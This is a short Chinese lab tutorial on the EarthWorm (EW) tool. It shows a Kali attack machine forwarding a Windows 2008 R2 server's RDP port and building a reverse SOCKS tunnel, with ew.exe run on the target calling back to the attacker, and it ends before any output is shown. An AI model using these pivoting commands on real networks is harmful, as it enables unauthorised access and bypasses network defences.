前言
EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透
EW可以已正向和方向以及多级级联的方式建立网络隧道
这里示范简单的正向以及反向是实现过程
实现环境
目标,使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接
过程
1.在EW工具包中,有很多版本,linux有32位的,以及64位的,首先我们需要输入以下命令来查看我们需要运行多少位的ew工具
file /bin/ls
发现我们是64位的,所以我们使用64位的EW
正向:
直接再kali攻击机中输入一下命令即可:
./ew_for_linux64 -s lcx_tran -l 8888 -f 192.168.206.129 -g 3389
以上意思是,将目标服务器的3389端口转发到我们攻击机的8888端口,然后访问攻击机的8888端口,即可连接目标服务器的3389端口
反向连接:
在kali攻击机中输入以下命令:
./ew_for_linux64 -s rcsocks -l 1008 -e 8888
以上的意思是,我们将向1008提出的请求转发到8888端口
然后,在目标机器上输入:
ew.exe -s rssocks 192.168.206.131 -e 8888
以上的意思是,开启socks服务,访问192.168.206.131的8888端口就可以进行目标机器(192.168.206.129)的socks服务,
出现以下字符显示成功